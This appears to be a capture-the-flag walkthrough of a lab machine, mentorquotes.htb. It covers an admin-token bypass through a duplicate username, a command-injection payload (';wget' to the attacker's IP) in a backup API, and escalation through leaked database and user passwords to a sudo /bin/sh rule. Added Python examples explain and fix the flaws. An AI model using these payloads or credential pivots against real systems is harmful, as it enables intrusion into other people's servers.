Open 10.129.84.190:22
Open 10.129.84.190:80
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.52
|_http-title: Did not follow redirect to http://mentorquotes.htb/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service Info: Host: mentorquotes.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
If you check http://api.mentorquotes.htb/docs/ you'll see that the author's username seems to be james and his e-mail address is james@mentorquotes.htb
Registering an account with the username james but a different e-mail address yields a token the API accepts on the admin endpoints: the authorization check evidently compares the username only, not the e-mail address.
Poking around didn't show anything interesting. Assuming that this endpoint is used to create or fetch backups, we check it for command injection.
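To see what the API is actually trusting, decode the token from the curl request below; the claims are just base64url-encoded JSON. This is an added example, not code from the page or the mentorquotes application: the two `is_admin_*` functions are an assumed reconstruction of a username-only check next to a stricter one, and the admin e-mail is the one shown on the /docs page.

```python
import base64
import json

# Token from the curl request on this page; the API signs it with HS256, but
# here we only inspect the claims and do not verify the signature.
TOKEN = (
    "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9."
    "eyJ1c2VybmFtZSI6ImphbWVzIiwiZW1haWwiOiJqYW1lczFAbWVudG9ycXVvdGVzLmh0YiJ9."
    "tqY0iQHU85zAkvffr--v1MMbO37NSNJs0Fo9ZMqRz48"
)

ADMIN_USERNAME = "james"
ADMIN_EMAIL = "james@mentorquotes.htb"  # as listed on /docs


def b64url_decode(segment: str) -> bytes:
    """Decode one base64url JWT segment, restoring the padding JWTs strip."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def jwt_claims(token: str) -> tuple[dict, dict]:
    """Return (header, payload) of a JWT without checking its signature."""
    header_b64, payload_b64, _signature = token.split(".")
    return (
        json.loads(b64url_decode(header_b64)),
        json.loads(b64url_decode(payload_b64)),
    )


def is_admin_username_only(claims: dict) -> bool:
    """Assumed shape of the flawed check: only the username is compared."""
    return claims.get("username") == ADMIN_USERNAME


def is_admin_strict(claims: dict) -> bool:
    """Stricter check: both identifiers must match the real admin account."""
    return (
        claims.get("username") == ADMIN_USERNAME
        and claims.get("email") == ADMIN_EMAIL
    )


if __name__ == "__main__":
    header, payload = jwt_claims(TOKEN)
    print(header)
    print(payload)
    print("username-only check:", is_admin_username_only(payload))
    print("username+email check:", is_admin_strict(payload))
```

The payload decodes to username james with e-mail james1@mentorquotes.htb, so the username-only check passes while the strict one fails. A proper fix goes one step further: derive the admin role from a server-side attribute of the stored account (looked up by a unique id), not from any claim the registration flow lets the user choose.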
# Setup python server to check for callbacks
python -m http.server 80
# Try to trick the server into using wget to contact us
curl -X 'POST' 'http://api.mentorquotes.htb/admin/backup' -H 'Content-Type: application/json' -H 'Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImphbWVzIiwiZW1haWwiOiJqYW1lczFAbWVudG9ycXVvdGVzLmh0YiJ9.tqY0iQHU85zAkvffr--v1MMbO37NSNJs0Fo9ZMqRz48' -d '{ "body": "a", "path": ";wget 10.10.14.75" }'
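The `;wget 10.10.14.75` payload works because the `path` value ends up inside a shell command line, where `;` terminates the intended command and starts the attacker's. The following is an added example, not the mentorquotes backup handler: it reconstructs the assumed vulnerable pattern with `echo` standing in for the real archiver (so it runs harmlessly), and puts the hardened form beside it.

```python
import subprocess
from pathlib import PurePosixPath

# Same shape as the payload sent to /admin/backup above, with a harmless
# command in place of wget.
PAYLOAD = "a; echo INJECTED"

# Characters that a POSIX shell treats as command separators or expansions.
SHELL_META = ";&|$`\n<>()"


def backup_vulnerable(path: str) -> str:
    """Assumed vulnerable handler: user input concatenated into a shell line."""
    cmd = f"echo archiving {path}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def backup_no_shell(path: str) -> str:
    """Same command without a shell: the payload is one literal argument."""
    return subprocess.run(
        ["echo", "archiving", path], capture_output=True, text=True
    ).stdout


def backup_hardened(path: str, base: str = "/data") -> str:
    """Validate the path, confine it under base, and never invoke a shell."""
    p = PurePosixPath(path)
    if p.is_absolute() or ".." in p.parts or any(c in path for c in SHELL_META):
        raise ValueError(f"rejected path: {path!r}")
    target = PurePosixPath(base) / p
    return subprocess.run(
        ["echo", "archiving", str(target)], capture_output=True, text=True
    ).stdout


if __name__ == "__main__":
    print(backup_vulnerable(PAYLOAD), end="")   # second line shows the injected command ran
    print(backup_no_shell(PAYLOAD), end="")     # payload echoed back literally
    print(backup_hardened("quotes.sql"), end="")
    try:
        backup_hardened(PAYLOAD)
    except ValueError as exc:
        print(exc)
```

Dropping `shell=True` alone already neutralises the `;`, but the allow-list on the path is what keeps an archiver from being pointed at `../../etc/shadow` or similar; both belong together. The example assumes a POSIX shell (`sh`), since that is what `shell=True` uses on Linux.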
ls -al
total 9044
drwxr-xr-x 1 root root 4096 Dec 12 00:58 .
drwxr-xr-x 1 root root 4096 Nov 10 16:00 ..
-rw-r--r-- 1 root root 1024 Jun 12 2022 .Dockerfile.swp
-rw-r--r-- 1 root root 522 Nov 3 12:58 Dockerfile
drwxr-xr-x 1 root root 4096 Dec 12 00:54 app
Within the app directory we find a file called db.py, which shows that a PostgreSQL database is reachable at 172.22.0.1 with default credentials:
import os

# Database URL; if none is passed in the environment, the default one is used
DATABASE_URL = os.getenv("DATABASE_URL", "postgresql://postgres:postgres@172.22.0.1/mentorquotes_db")
Priv Esc
Postgres
We set up chisel for port forwarding/tunneling and check the database.
With the credentials svc:123meunomeeivani we can log in to the main server.
User: James
Since there was no obvious path to root, we checked for basic things such as passwords set somewhere on the system and readable by any user.
The password SuperSecurePassword123__ lets us switch to james.
Root
james@mentor:~$ sudo -l
[sudo] password for james:
Matching Defaults entries for james on mentor:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User james may run the following commands on mentor:
(ALL) /bin/sh